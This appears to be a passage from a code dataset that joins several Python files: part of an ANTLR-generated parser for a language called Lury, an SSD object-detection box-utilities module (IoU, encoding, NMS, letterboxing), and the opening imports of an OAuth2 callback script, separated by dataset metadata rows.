listener.enterString(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitString" ):
listener.exitString(self)
class HashContext(LiteralContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.LiteralContext
super().__init__(parser)
self.copyFrom(ctx)
def hash_literal(self):
return self.getTypedRuleContext(LuryParser.Hash_literalContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHash" ):
listener.enterHash(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHash" ):
listener.exitHash(self)
def literal(self):
localctx = LuryParser.LiteralContext(self, self._ctx, self.state)
self.enterRule(localctx, 46, self.RULE_literal)
self._la = 0 # Token type
try:
self.state = 292
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [LuryParser.STRING_LITERAL]:
localctx = LuryParser.StringContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 287
self.match(LuryParser.STRING_LITERAL)
pass
elif token in [LuryParser.FLOAT_NUMBER]:
localctx = LuryParser.RealContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 288
self.match(LuryParser.FLOAT_NUMBER)
pass
elif token in [LuryParser.DECIMAL_INTEGER, LuryParser.OCT_INTEGER, LuryParser.HEX_INTEGER, LuryParser.BIN_INTEGER]:
localctx = LuryParser.IntegerContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 289
_la = self._input.LA(1)
if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << LuryParser.DECIMAL_INTEGER) | (1 << LuryParser.OCT_INTEGER) | (1 << LuryParser.HEX_INTEGER) | (1 << LuryParser.BIN_INTEGER))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
pass
elif token in [LuryParser.T__42]:
localctx = LuryParser.ListContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 290
self.list_literal()
pass
elif token in [LuryParser.T__49]:
localctx = LuryParser.HashContext(self, localctx)
self.enterOuterAlt(localctx, 5)
self.state = 291
self.hash_literal()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class List_literalContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self.element = None # List_elementContext
def list_element(self):
return self.getTypedRuleContext(LuryParser.List_elementContext,0)
def getRuleIndex(self):
return LuryParser.RULE_list_literal
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterList_literal" ):
listener.enterList_literal(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitList_literal" ):
listener.exitList_literal(self)
def list_literal(self):
localctx = LuryParser.List_literalContext(self, self._ctx, self.state)
self.enterRule(localctx, 48, self.RULE_list_literal)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 294
self.match(LuryParser.T__42)
self.state = 296
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << LuryParser.T__16) | (1 << LuryParser.T__32) | (1 << LuryParser.T__33) | (1 << LuryParser.T__34) | (1 << LuryParser.T__40) | (1 << LuryParser.T__41) | (1 << LuryParser.T__42) | (1 << LuryParser.T__44) | (1 << LuryParser.T__45) | (1 << LuryParser.T__46) | (1 << LuryParser.T__47) | (1 << LuryParser.T__49) | (1 << LuryParser.NAME) | (1 << LuryParser.STRING_LITERAL) | (1 << LuryParser.DECIMAL_INTEGER) | (1 << LuryParser.OCT_INTEGER) | (1 << LuryParser.HEX_INTEGER) | (1 << LuryParser.BIN_INTEGER) | (1 << LuryParser.FLOAT_NUMBER))) != 0):
self.state = 295
localctx.element = self.list_element(0)
self.state = 298
self.match(LuryParser.T__43)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class List_elementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_list_element
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class ListElementsContext(List_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.List_elementContext
super().__init__(parser)
self.copyFrom(ctx)
def list_element(self):
return self.getTypedRuleContext(LuryParser.List_elementContext,0)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterListElements" ):
listener.enterListElements(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitListElements" ):
listener.exitListElements(self)
class ListElementContext(List_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.List_elementContext
super().__init__(parser)
self.copyFrom(ctx)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterListElement" ):
listener.enterListElement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitListElement" ):
listener.exitListElement(self)
def list_element(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.List_elementContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 50
self.enterRecursionRule(localctx, 50, self.RULE_list_element, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.ListElementContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 301
self.bool_not_expression()
self.state = 303
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,29,self._ctx)
if la_ == 1:
self.state = 302
self.match(LuryParser.T__15)
self._ctx.stop = self._input.LT(-1)
self.state = 313
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,31,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = LuryParser.ListElementsContext(self, LuryParser.List_elementContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_list_element)
self.state = 305
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 306
self.match(LuryParser.T__15)
self.state = 307
self.bool_not_expression()
self.state = 309
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,30,self._ctx)
if la_ == 1:
self.state = 308
self.match(LuryParser.T__15)
self.state = 315
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,31,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Hash_literalContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self.element = None # Hash_elementContext
def hash_element(self):
return self.getTypedRuleContext(LuryParser.Hash_elementContext,0)
def getRuleIndex(self):
return LuryParser.RULE_hash_literal
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHash_literal" ):
listener.enterHash_literal(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHash_literal" ):
listener.exitHash_literal(self)
def hash_literal(self):
localctx = LuryParser.Hash_literalContext(self, self._ctx, self.state)
self.enterRule(localctx, 52, self.RULE_hash_literal)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 316
self.match(LuryParser.T__49)
self.state = 318
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << LuryParser.T__42) | (1 << LuryParser.T__44) | (1 << LuryParser.T__45) | (1 << LuryParser.T__46) | (1 << LuryParser.T__47) | (1 << LuryParser.T__49) | (1 << LuryParser.NAME) | (1 << LuryParser.STRING_LITERAL) | (1 << LuryParser.DECIMAL_INTEGER) | (1 << LuryParser.OCT_INTEGER) | (1 << LuryParser.HEX_INTEGER) | (1 << LuryParser.BIN_INTEGER) | (1 << LuryParser.FLOAT_NUMBER))) != 0):
self.state = 317
localctx.element = self.hash_element(0)
self.state = 320
self.match(LuryParser.T__50)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Hash_elementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_hash_element
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class HashElementNameContext(Hash_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Hash_elementContext
super().__init__(parser)
self.copyFrom(ctx)
def NAME(self):
return self.getToken(LuryParser.NAME, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHashElementName" ):
listener.enterHashElementName(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHashElementName" ):
listener.exitHashElementName(self)
class HashElementsContext(Hash_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Hash_elementContext
super().__init__(parser)
self.nest = None # Hash_elementContext
self.key = None # PrimaryContext
self.value = None # Bool_not_expressionContext
self.copyFrom(ctx)
def hash_element(self):
return self.getTypedRuleContext(LuryParser.Hash_elementContext,0)
def primary(self):
return self.getTypedRuleContext(LuryParser.PrimaryContext,0)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHashElements" ):
listener.enterHashElements(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHashElements" ):
listener.exitHashElements(self)
class HashElementContext(Hash_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Hash_elementContext
super().__init__(parser)
self.key = None # PrimaryContext
self.value = None # Bool_not_expressionContext
self.copyFrom(ctx)
def primary(self):
return self.getTypedRuleContext(LuryParser.PrimaryContext,0)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHashElement" ):
listener.enterHashElement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHashElement" ):
listener.exitHashElement(self)
class HashElementsVariableContext(Hash_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Hash_elementContext
super().__init__(parser)
self.nest = None # Hash_elementContext
self.key = None # PrimaryContext
self.value = None # Bool_not_expressionContext
self.copyFrom(ctx)
def hash_element(self):
return self.getTypedRuleContext(LuryParser.Hash_elementContext,0)
def primary(self):
return self.getTypedRuleContext(LuryParser.PrimaryContext,0)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHashElementsVariable" ):
listener.enterHashElementsVariable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHashElementsVariable" ):
listener.exitHashElementsVariable(self)
class HashElementVariableContext(Hash_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Hash_elementContext
super().__init__(parser)
self.key = None # PrimaryContext
self.value = None # Bool_not_expressionContext
self.copyFrom(ctx)
def primary(self):
return self.getTypedRuleContext(LuryParser.PrimaryContext,0)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHashElementVariable" ):
listener.enterHashElementVariable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHashElementVariable" ):
listener.exitHashElementVariable(self)
class HashElementsNameContext(Hash_elementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Hash_elementContext
super().__init__(parser)
self.nest = None # Hash_elementContext
self.copyFrom(ctx)
def NAME(self):
return self.getToken(LuryParser.NAME, 0)
def hash_element(self):
return self.getTypedRuleContext(LuryParser.Hash_elementContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterHashElementsName" ):
listener.enterHashElementsName(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitHashElementsName" ):
listener.exitHashElementsName(self)
def hash_element(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Hash_elementContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 54
self.enterRecursionRule(localctx, 54, self.RULE_hash_element, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 341
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,36,self._ctx)
if la_ == 1:
localctx = LuryParser.HashElementContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 323
localctx.key = self.primary()
self.state = 324
self.match(LuryParser.T__51)
self.state = 325
localctx.value = self.bool_not_expression()
self.state = 327
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,33,self._ctx)
if la_ == 1:
self.state = 326
self.match(LuryParser.T__15)
pass
elif la_ == 2:
localctx = LuryParser.HashElementVariableContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 329
self.match(LuryParser.T__42)
self.state = 330
localctx.key = self.primary()
self.state = 331
self.match(LuryParser.T__43)
self.state = 332
self.match(LuryParser.T__51)
self.state = 333
localctx.value = self.bool_not_expression()
self.state = 335
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,34,self._ctx)
if la_ == 1:
self.state = 334
self.match(LuryParser.T__15)
pass
elif la_ == 3:
localctx = LuryParser.HashElementNameContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 337
self.match(LuryParser.NAME)
self.state = 339
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,35,self._ctx)
if la_ == 1:
self.state = 338
self.match(LuryParser.T__15)
pass
self._ctx.stop = self._input.LT(-1)
self.state = 369
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,41,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 367
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,40,self._ctx)
if la_ == 1:
localctx = LuryParser.HashElementsContext(self, LuryParser.Hash_elementContext(self, _parentctx, _parentState))
localctx.nest = _prevctx
self.pushNewRecursionContext(localctx, _startState, self.RULE_hash_element)
self.state = 343
if not self.precpred(self._ctx, 6):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 6)")
self.state = 344
self.match(LuryParser.T__15)
self.state = 345
localctx.key = self.primary()
self.state = 346
self.match(LuryParser.T__51)
self.state = 347
localctx.value = self.bool_not_expression()
self.state = 349
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,37,self._ctx)
if la_ == 1:
self.state = 348
self.match(LuryParser.T__15)
pass
elif la_ == 2:
localctx = LuryParser.HashElementsVariableContext(self, LuryParser.Hash_elementContext(self, _parentctx, _parentState))
localctx.nest = _prevctx
self.pushNewRecursionContext(localctx, _startState, self.RULE_hash_element)
self.state = 351
if not self.precpred(self._ctx, 5):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 5)")
self.state = 352
self.match(LuryParser.T__15)
self.state = 353
self.match(LuryParser.T__42)
self.state = 354
localctx.key = self.primary()
self.state = 355
self.match(LuryParser.T__43)
self.state = 356
self.match(LuryParser.T__51)
self.state = 357
localctx.value = self.bool_not_expression()
self.state = 359
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,38,self._ctx)
if la_ == 1:
self.state = 358
self.match(LuryParser.T__15)
pass
elif la_ == 3:
localctx = LuryParser.HashElementsNameContext(self, LuryParser.Hash_elementContext(self, _parentctx, _parentState))
localctx.nest = _prevctx
self.pushNewRecursionContext(localctx, _startState, self.RULE_hash_element)
self.state = 361
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 362
self.match(LuryParser.T__15)
self.state = 363
self.match(LuryParser.NAME)
self.state = 365
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,39,self._ctx)
if la_ == 1:
self.state = 364
self.match(LuryParser.T__15)
pass
self.state = 371
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,41,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):
if self._predicates == None:
self._predicates = dict()
self._predicates[7] = self.comma_expression_sempred
self._predicates[9] = self.comparison_expression_sempred
self._predicates[10] = self.range_expression_sempred
self._predicates[11] = self.in_expression_sempred
self._predicates[12] = self.or_expression_sempred
self._predicates[13] = self.xor_expression_sempred
self._predicates[14] = self.and_expression_sempred
self._predicates[15] = self.shift_expression_sempred
self._predicates[16] = self.addition_expression_sempred
self._predicates[17] = self.multiplication_expression_sempred
self._predicates[20] = self.postfix_expression_sempred
self._predicates[25] = self.list_element_sempred
self._predicates[27] = self.hash_element_sempred
pred = self._predicates.get(ruleIndex, None)
if pred is None:
raise Exception("No predicate with index:" + str(ruleIndex))
else:
return pred(localctx, predIndex)
def comma_expression_sempred(self, localctx:Comma_expressionContext, predIndex:int):
if predIndex == 0:
return self.precpred(self._ctx, 2)
def comparison_expression_sempred(self, localctx:Comparison_expressionContext, predIndex:int):
if predIndex == 1:
return self.precpred(self._ctx, 7)
if predIndex == 2:
return self.precpred(self._ctx, 6)
if predIndex == 3:
return self.precpred(self._ctx, 5)
if predIndex == 4:
return self.precpred(self._ctx, 4)
if predIndex == 5:
return self.precpred(self._ctx, 3)
if predIndex == 6:
return self.precpred(self._ctx, 2)
def range_expression_sempred(self, localctx:Range_expressionContext, predIndex:int):
if predIndex == 7:
return self.precpred(self._ctx, 3)
if predIndex == 8:
return self.precpred(self._ctx, 2)
def in_expression_sempred(self, localctx:In_expressionContext, predIndex:int):
if predIndex == 9:
return self.precpred(self._ctx, 3)
if predIndex == 10:
return self.precpred(self._ctx, 2)
def or_expression_sempred(self, localctx:Or_expressionContext, predIndex:int):
if predIndex == 11:
return self.precpred(self._ctx, 2)
def xor_expression_sempred(self, localctx:Xor_expressionContext, predIndex:int):
if predIndex == 12:
return self.precpred(self._ctx, 2)
def and_expression_sempred(self, localctx:And_expressionContext, predIndex:int):
if predIndex == 13:
return self.precpred(self._ctx, 2)
def shift_expression_sempred(self, localctx:Shift_expressionContext, predIndex:int):
if predIndex == 14:
return self.precpred(self._ctx, 3)
if predIndex == 15:
return self.precpred(self._ctx, 2)
def addition_expression_sempred(self, localctx:Addition_expressionContext, predIndex:int):
if predIndex == 16:
return self.precpred(self._ctx, 4)
if predIndex == 17:
return self.precpred(self._ctx, 3)
if predIndex == 18:
return self.precpred(self._ctx, 2)
def multiplication_expression_sempred(self, localctx:Multiplication_expressionContext, predIndex:int):
if predIndex == 19:
return self.precpred(self._ctx, 5)
if predIndex == 20:
return self.precpred(self._ctx, 4)
if predIndex == 21:
return self.precpred(self._ctx, 3)
if predIndex == 22:
return self.precpred(self._ctx, 2)
def postfix_expression_sempred(self, localctx:Postfix_expressionContext, predIndex:int):
if predIndex == 23:
return self.precpred(self._ctx, 4)
if predIndex == 24:
return self.precpred(self._ctx, 3)
if predIndex == 25:
return self.precpred(self._ctx, 2)
def list_element_sempred(self, localctx:List_elementContext, predIndex:int):
if predIndex == 26:
return self.precpred(self._ctx, 2)
def hash_element_sempred(self, localctx:Hash_elementContext, predIndex:int):
if predIndex == 27:
return self.precpred(self._ctx, 6)
if predIndex == 28:
return self.precpred(self._ctx, 5)
if predIndex == 29:
return self.precpred(self._ctx, 4)
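# --- Illustrative driver sketch for the generated parser (hedged; not part of the ANTLR output) ---
# Assumptions: ANTLR also generated a sibling LuryLexer module, and `expression` is a usable
# entry rule of LuryParser; both names are inferred from the grammar, not confirmed here.
def _parse_expression_example(source: str):
    from antlr4 import InputStream, CommonTokenStream
    from LuryLexer import LuryLexer  # assumed sibling module produced by the same grammar
    lexer = LuryLexer(InputStream(source))
    parser = LuryParser(CommonTokenStream(lexer))
    tree = parser.expression()                 # parse a single expression
    return tree.toStringTree(recog=parser)     # LISP-style dump of the parse tree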
| 39.91071 | 630 | 0.593581 |
8cfdfe456bfa10655db24f02130c225b372ee915 | 5,754 | py | Python | utils/box_utils.py | jz1248/ssd-pytorch | 7903aeb53b78bc840eb3a0e0e805a3e3dcc85e47 | ["MIT"] | 1 | 2020-08-06T01:13:54.000Z | 2020-08-06T01:13:54.000Z | utils/box_utils.py | iwanggp/ssd-pytorch | ecc859bf1c5dcec99cebafea9f47f24e8c1cd88d | ["MIT"] | null | null | null | utils/box_utils.py | iwanggp/ssd-pytorch | ecc859bf1c5dcec99cebafea9f47f24e8c1cd88d | ["MIT"] | null | null | null |
import torch
import numpy as np
from PIL import Image
def point_form(boxes):
    # Convert boxes from center form (cx, cy, w, h) to corner form (xmin, ymin, xmax, ymax).
    return torch.cat((boxes[:, :2] - boxes[:, 2:]/2,      # xmin, ymin
                      boxes[:, :2] + boxes[:, 2:]/2), 1)  # xmax, ymax
def center_size(boxes):
    # Convert boxes from corner form (xmin, ymin, xmax, ymax) to center form (cx, cy, w, h).
    return torch.cat(((boxes[:, 2:] + boxes[:, :2])/2,    # cx, cy
                      boxes[:, 2:] - boxes[:, :2]), 1)    # w, h
def intersect(box_a, box_b):
A = box_a.size(0)
B = box_b.size(0)
max_xy = torch.min(box_a[:, 2:].unsqueeze(1).expand(A, B, 2),
box_b[:, 2:].unsqueeze(0).expand(A, B, 2))
min_xy = torch.max(box_a[:, :2].unsqueeze(1).expand(A, B, 2),
box_b[:, :2].unsqueeze(0).expand(A, B, 2))
inter = torch.clamp((max_xy - min_xy), min=0)
    # Intersection area between every prior box and every ground-truth box
return inter[:, :, 0] * inter[:, :, 1]
def jaccard(box_a, box_b):
inter = intersect(box_a, box_b)
    # Areas of the prior boxes and of the ground-truth boxes
area_a = ((box_a[:, 2]-box_a[:, 0]) *
(box_a[:, 3]-box_a[:, 1])).unsqueeze(1).expand_as(inter) # [A,B]
area_b = ((box_b[:, 2]-box_b[:, 0]) *
(box_b[:, 3]-box_b[:, 1])).unsqueeze(0).expand_as(inter) # [A,B]
    # IoU = intersection / union
union = area_a + area_b - inter
return inter / union # [A,B]
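# Minimal usage sketch of jaccard() with hand-made corner-form boxes; the numbers are
# illustrative only, not taken from the SSD pipeline.
def _jaccard_example():
    box_a = torch.tensor([[0.0, 0.0, 2.0, 2.0]])   # 2x2 box
    box_b = torch.tensor([[1.0, 1.0, 3.0, 3.0]])   # 2x2 box shifted by (1, 1)
    # Intersection area = 1, union = 4 + 4 - 1 = 7, so the IoU should be about 0.1429.
    return jaccard(box_a, box_b)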
def match(threshold, truths, priors, variances, labels, loc_t, conf_t, idx):
    # Overlap (IoU) between every ground-truth box and every prior box
overlaps = jaccard(
truths,
point_form(priors)
)
    # Best-overlapping prior for each ground-truth box, shape [num_truths, 1]
best_prior_overlap, best_prior_idx = overlaps.max(1, keepdim=True)
best_prior_idx.squeeze_(1)
best_prior_overlap.squeeze_(1)
    # Best-overlapping ground-truth box for each prior, shape [1, num_priors]
best_truth_overlap, best_truth_idx = overlaps.max(0, keepdim=True)
best_truth_idx.squeeze_(0)
best_truth_overlap.squeeze_(0)
    # Force the best prior of each ground-truth box to a high overlap (2) so that every ground truth keeps at least one matching prior
best_truth_overlap.index_fill_(0, best_prior_idx, 2)
    # Make those forced priors point back to the ground-truth boxes they were matched to
for j in range(best_prior_idx.size(0)):
best_truth_idx[best_prior_idx[j]] = j
    # Ground-truth box assigned to each prior
matches = truths[best_truth_idx] # Shape: [num_priors,4]
conf = labels[best_truth_idx] + 1 # Shape: [num_priors]
    # Priors whose best overlap is below the threshold are labeled as background
conf[best_truth_overlap < threshold] = 0 # label as background
loc = encode(matches, priors, variances)
loc_t[idx] = loc # [num_priors,4] encoded offsets to learn
conf_t[idx] = conf # [num_priors] top class label for each prior
def encode(matched, priors, variances):
g_cxcy = (matched[:, :2] + matched[:, 2:])/2 - priors[:, :2]
g_cxcy /= (variances[0] * priors[:, 2:])
g_wh = (matched[:, 2:] - matched[:, :2]) / priors[:, 2:]
g_wh = torch.log(g_wh) / variances[1]
return torch.cat([g_cxcy, g_wh], 1)
# Adapted from https://github.com/Hakuyume/chainer-ssd
def decode(loc, priors, variances):
boxes = torch.cat((
priors[:, :2] + loc[:, :2] * variances[0] * priors[:, 2:],
priors[:, 2:] * torch.exp(loc[:, 2:] * variances[1])), 1)
boxes[:, :2] -= boxes[:, 2:] / 2
boxes[:, 2:] += boxes[:, :2]
return boxes
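# Minimal round-trip sketch for encode()/decode(): matched boxes are in corner form and
# priors in center form, so decoding the encoded offsets should recover the matched boxes.
# The values below are illustrative only.
def _encode_decode_example():
    variances = [0.1, 0.2]
    priors = torch.tensor([[0.5, 0.5, 0.4, 0.4]])    # (cx, cy, w, h)
    matched = torch.tensor([[0.3, 0.3, 0.7, 0.8]])   # (xmin, ymin, xmax, ymax)
    loc = encode(matched, priors, variances)
    recovered = decode(loc, priors, variances)       # ~= matched, up to float error
    return torch.allclose(recovered, matched, atol=1e-5)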
def log_sum_exp(x):
x_max = x.data.max()
return torch.log(torch.sum(torch.exp(x-x_max), 1, keepdim=True)) + x_max
# Original author: Francisco Massa:
# https://github.com/fmassa/object-detection.torch
# Ported to PyTorch by Max deGroot (02/01/2017)
def nms(boxes, scores, overlap=0.5, top_k=200):
keep = scores.new(scores.size(0)).zero_().long()
if boxes.numel() == 0:
return keep
x1 = boxes[:, 0]
y1 = boxes[:, 1]
x2 = boxes[:, 2]
y2 = boxes[:, 3]
area = torch.mul(x2 - x1, y2 - y1)
v, idx = scores.sort(0)
idx = idx[-top_k:]
xx1 = boxes.new()
yy1 = boxes.new()
xx2 = boxes.new()
yy2 = boxes.new()
w = boxes.new()
h = boxes.new()
count = 0
while idx.numel() > 0:
i = idx[-1]
keep[count] = i
count += 1
if idx.size(0) == 1:
break
idx = idx[:-1]
torch.index_select(x1, 0, idx, out=xx1)
torch.index_select(y1, 0, idx, out=yy1)
torch.index_select(x2, 0, idx, out=xx2)
torch.index_select(y2, 0, idx, out=yy2)
xx1 = torch.clamp(xx1, min=x1[i])
yy1 = torch.clamp(yy1, min=y1[i])
xx2 = torch.clamp(xx2, max=x2[i])
yy2 = torch.clamp(yy2, max=y2[i])
w.resize_as_(xx2)
h.resize_as_(yy2)
w = xx2 - xx1
h = yy2 - yy1
w = torch.clamp(w, min=0.0)
h = torch.clamp(h, min=0.0)
inter = w*h
rem_areas = torch.index_select(area, 0, idx)
union = (rem_areas - inter) + area[i]
IoU = inter/union
idx = idx[IoU.le(overlap)]
return keep, count
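# Minimal usage sketch for nms(): corner-form boxes and scores for three detections, two of
# which overlap heavily, so only the higher-scoring one of the pair survives. Illustrative
# values only.
def _nms_example():
    boxes = torch.tensor([[0.0, 0.0, 1.0, 1.0],
                          [0.05, 0.05, 1.05, 1.05],   # near-duplicate of the first box
                          [2.0, 2.0, 3.0, 3.0]])
    scores = torch.tensor([0.9, 0.8, 0.7])
    keep, count = nms(boxes, scores, overlap=0.5, top_k=200)
    return keep[:count]   # indices of the boxes kept after suppression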
def letterbox_image(image, size):
iw, ih = image.size
w, h = size
scale = min(w/iw, h/ih)
nw = int(iw*scale)
nh = int(ih*scale)
image = image.resize((nw,nh), Image.BICUBIC)
new_image = Image.new('RGB', size, (128,128,128))
new_image.paste(image, ((w-nw)//2, (h-nh)//2))
return new_image
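# Minimal usage sketch for letterbox_image(): scale a PIL image to fit a 300x300 canvas while
# keeping its aspect ratio, padding the rest with gray. The input size is illustrative only.
def _letterbox_example():
    image = Image.new('RGB', (640, 480), (255, 0, 0))
    return letterbox_image(image, (300, 300))   # 300x300 image with gray bars top and bottom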
def ssd_correct_boxes(top, left, bottom, right, input_shape, image_shape):
new_shape = image_shape*np.min(input_shape/image_shape)
offset = (input_shape-new_shape)/2./input_shape
scale = input_shape/new_shape
box_yx = np.concatenate(((top+bottom)/2,(left+right)/2),axis=-1)
box_hw = np.concatenate((bottom-top,right-left),axis=-1)
box_yx = (box_yx - offset) * scale
box_hw *= scale
box_mins = box_yx - (box_hw / 2.)
box_maxes = box_yx + (box_hw / 2.)
boxes = np.concatenate([
box_mins[:, 0:1],
box_mins[:, 1:2],
box_maxes[:, 0:1],
box_maxes[:, 1:2]
],axis=-1)
print(np.shape(boxes))
boxes *= np.concatenate([image_shape, image_shape],axis=-1)
return boxes
| 32.693182 | 79 | 0.578728 |
9bf037155666da15f6b9ca1415b7b7bedeae7b9c | 8,824 | py | Python | callback.py | skeggse/terraform-aws-oauth2-authenticator | 76df9389b2858510c21782867d63ccba7f43ceab | ["MIT"] | null | null | null | callback.py | skeggse/terraform-aws-oauth2-authenticator | 76df9389b2858510c21782867d63ccba7f43ceab | ["MIT"] | 1 | 2021-05-19T20:03:44.000Z | 2021-05-19T20:03:44.000Z | callback.py | skeggse/terraform-aws-oauth2-authenticator | 76df9389b2858510c21782867d63ccba7f43ceab | ["MIT"] | null | null | null |
import base64
from dataclasses import asdict, dataclass
from datetime import datetime, timedelta, timezone
from enum import Enum
from hmac import compare_digest
import json
from os import environ
import time
from typing import Any, FrozenSet
